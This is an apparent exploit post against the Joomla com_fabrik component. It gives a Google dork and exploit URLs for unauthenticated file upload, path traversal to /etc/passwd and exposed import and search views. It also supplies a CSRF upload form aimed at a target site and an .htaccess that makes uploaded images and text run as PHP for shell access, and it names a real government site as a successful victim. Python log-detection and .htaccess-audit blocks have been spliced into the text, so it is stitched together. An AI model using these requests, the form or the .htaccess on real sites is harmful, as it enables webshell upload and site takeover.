KingSkrupellos

Joomla Com_Fabrik Multiple Vulnerabilities 28/11/2018

Nov 28th, 2018
#################################################################################################

# Exploit Title : Joomla Com_Fabrik pluginAjax importcsv _advancedsearch getprodimg controller LFI with htaccess CSRF Shell Access Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 29/11/2018
# Vendor Homepage : extensions.joomla.org/extension/fabrik/ ~ fabrikar.com
# Tested On : Windows and Linux
# Software Download Links : fabrikar.com/downloads
# Category : WebApps
# Version Information : All Current Versions.
# Google Dorks : inurl:''/index.php?option=com_fabrik''
# Exploit Risk : Medium
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
+ CWE-434 - [ Unrestricted Upload of File with Dangerous Type PHP ]

#################################################################################################

# Exploit Title : Joomla Com_Fabrik pluginAjax importcsv _advancedsearch getprodimg controller LFI with htaccess CSRF Shell Access Vulnerability

# Admin Panel Login Path :

/administrator/

#################################################################################################

# Exploit 1 :

/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

# Error :

{"filepath":null,"uri":null}

{"error":"Error. Unable to upload file."}

#################################################################################################

# Exploit 2 :

/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0

Directory File Path : /media/...

#################################################################################################

# Exploit 3 :

/index.php?option=com_fabrik&format=partial&view=list&layout=_advancedsearch&tmpl=component&listid=11

/index.php?option=com_fabrik&format=partial&view=list&layout=_advancedsearch&tmpl=component&listid=12&nextview=list&scope=com_fabrik&tkn=[RANDOM-HASH-NUMBERS]

Add and Delete Vulnerability

Note : If the site responds to the request above with '' Sorry this form is not published '', it is not vulnerable; the bug has been fixed.

#################################################################################################

# Exploit 4 :

/component/fabrik/form/8/index.php?option=com_fabrik&format=raw&controller=plugin&c=plugin&task=userAjax&method=getprodimg

# Example Error :

{"id":8,"model":"table","errors":[],"data":{"___betrieb":[""],"___modell":"","___betreff":"Probefahrt","___firma":"","
___anrede":["0"],"___name":"","___email":"",
"___strasse":"","___plz":"","___ort":"","___telefon":"","___bemerkungen":"","___empfaenger":"","___captcha":"","
___datenschutz":[""]},"html":{"___betrieb":"\r\n","___modell":"","___betreff":"<!-- Probefahrt -->","___firma":"",
"___anrede":"bitte wählen","___name":"","___email":"","___strasse":"","___plz":"","___ort":"","___telefon":"",
"___bemerkungen":"","___empfaenger":"<!-- -->","___captcha":"","___datenschutz":""},"post":
{"option":"com_fabrik","format":"raw","controller":"plugin","c":"plugin","task":"userAjax","method":
"getprodimg\\","Itemid":null,"view":"form","formid":"8","rowid":"index"}}

#################################################################################################

# Exploit 5 :

/index.php?option=com_fabrik&controller=[Local File Inclusion]

/index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00

Note : If the response is '' 0 Call to a member function getData() on null '', the vulnerability has been fixed.
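Added defender-side example, not part of the original advisory: a Python classifier that tags Apache access-log requests matching the com_fabrik request patterns of Exploits 1, 2, 3 and 5 above. The log lines, client addresses and tag names are constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Constructed Apache combined-log lines (not from the original post): one benign request, then one per pattern.
SAMPLE_LOG = """\
203.0.113.5 - - [28/Nov/2018:10:00:01 +0000] "GET /index.php?option=com_content&view=article&id=3 HTTP/1.1" 200 5120
203.0.113.7 - - [28/Nov/2018:10:00:02 +0000] "POST /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload HTTP/1.1" 200 48
203.0.113.7 - - [28/Nov/2018:10:00:03 +0000] "GET /index.php?option=com_fabrik&controller=../../../../etc/passwd%00 HTTP/1.1" 200 1800
203.0.113.9 - - [28/Nov/2018:10:00:04 +0000] "GET /index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1 HTTP/1.1" 200 900
203.0.113.9 - - [28/Nov/2018:10:00:05 +0000] "GET /index.php?option=com_fabrik&format=partial&view=list&layout=_advancedsearch&tmpl=component&listid=11 HTTP/1.1" 200 700
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def classify(line):
    """Tag one access-log line with the com_fabrik request patterns it matches."""
    m = LOG_RE.match(line)
    if not m:
        return []
    query = m.group("target").partition("?")[2]
    # parse_qs percent-decodes values, so an encoded %00 arrives as a real NUL byte.
    p = {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}
    if p.get("option") != "com_fabrik":
        return []
    tags = []
    if (p.get("task") == "plugin.pluginAjax" and p.get("plugin") == "fileupload"
            and p.get("method") == "ajax_upload"):
        tags.append("fabrik_ajax_upload")           # Exploit 1: unauthenticated upload endpoint
    ctrl = p.get("controller", "")
    if "../" in ctrl or "\x00" in ctrl:
        tags.append("fabrik_controller_traversal")  # Exploit 5: traversal or NUL in controller=
    if p.get("c") == "import" and p.get("view") == "import":
        tags.append("fabrik_csv_import")            # Exploit 2: CSV import view
    if p.get("layout") == "_advancedsearch":
        tags.append("fabrik_advancedsearch")        # Exploit 3: advanced-search layout
    return tags

def scan(log_text):
    """Return (ip, status, tags) for every line that matched at least one pattern."""
    hits = []
    for line in log_text.splitlines():
        tags = classify(line)
        if tags:
            m = LOG_RE.match(line)
            hits.append((m.group("ip"), int(m.group("status")), tags))
    return hits
```

A 200 status on the upload or traversal pattern is the condition worth alerting on; a 403 or 404 on the same paths is consistent with a fixed or hardened install.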

#################################################################################################

# CSRF Exploiter Code => [ Upload Htaccess File via This Script ] - Save this file as [yourfilename].html

<title>KingSkrupellos - Cyberizm Digital Security Team</title>
<br>
<br>
<center><font size="10"><h1>Joomla CSRF Com_Fabrik File Upload Shell Access Exploiter</h1><br><br>
<form method="POST" action="http://www.[TARGETSITE]/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload" enctype="multipart/form-data">
<input type="file" name="file"><button>OKAY</button>
</form>
<br></font></center>

#################################################################################################

# HtAccess File =>

DirectoryIndex cyberizm.html
AddType application/x-httpd-php .png
AddType application/x-httpd-php .gif
AddType application/x-httpd-php .jpg
AddType application/x-httpd-php .txt
AddType application/x-httpd-php .fla
AddType application/x-httpd-php .php
AddType application/x-httpd-php .asp
AddType application/x-httpd-php .js
AddType application/x-httpd-php .shtml
AddType application/x-httpd-php .html
AddType application/x-httpd-php .htm

# or you can use this

DirectoryIndex index.html
AddType application/x-httpd-php .png
AddType application/x-httpd-php .txt
AddType application/x-httpd-php .fla
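Added audit example, not from the original post: it flags the directives above that bind the PHP handler to non-PHP extensions or override DirectoryIndex, and checks that a hardened upload-directory .htaccess (an assumed baseline written here, not shipped by Joomla or Fabrik) comes back clean.

```python
import re

# Constructed .htaccess contents (not from the original post). PLANTED mirrors the
# directive set above, which makes uploaded image/text files run as PHP; HARDENED is an
# assumed baseline for an upload directory such as /media/, not Joomla's own file.
PLANTED = """\
DirectoryIndex cyberizm.html
AddType application/x-httpd-php .png
AddType application/x-httpd-php .jpg
AddType application/x-httpd-php .txt
"""

HARDENED = """\
# php_flag only reaches mod_php; the FilesMatch block also covers php-fpm setups
RemoveHandler .php .phtml .phar
php_flag engine off
<FilesMatch "\\.(php|phtml|phar)$">
    Require all denied
</FilesMatch>
"""

DIRECTIVE_RE = re.compile(
    r"^\s*(AddType|AddHandler|SetHandler|DirectoryIndex|php_flag)\s+(.*)$", re.I
)

def audit_htaccess(text):
    """Return (line_no, finding) pairs for directives that turn uploads into executable code."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        m = DIRECTIVE_RE.match(raw)
        if not m:
            continue
        directive, args = m.group(1).lower(), m.group(2).split()
        if directive in ("addtype", "addhandler", "sethandler") and args and "php" in args[0].lower():
            # Any extension other than .php bound to the PHP handler is a code-execution path.
            exts = [e for e in args[1:] if e.lower() != ".php"]
            if exts or directive == "sethandler":
                findings.append((n, f"{m.group(1)} binds PHP handler to {' '.join(exts) or 'every file'}"))
        elif directive == "directoryindex":
            findings.append((n, f"DirectoryIndex overridden to {' '.join(args)}"))
        elif directive == "php_flag" and [a.lower() for a in args[:2]] == ["engine", "on"]:
            findings.append((n, "php_flag engine on re-enables PHP execution"))
    return findings
```

Run it over every .htaccess found under the site's upload directories; an unexpected .htaccess in /media/ at all is already the indicator the Exploit 1 scenario leaves behind.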

#################################################################################################

# Exploit 1 => Example Successful Attack Scenario =>

{"filepath":"\/.htaccess","uri":"http:\/\/pn-kebumen.go.id\/.htaccess"}

# Shell Access Path : TARGETDOMAIN/media/[YOURSHELLNAMEHERE.php]

#################################################################################################

# Example Vulnerable Sites =>
#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################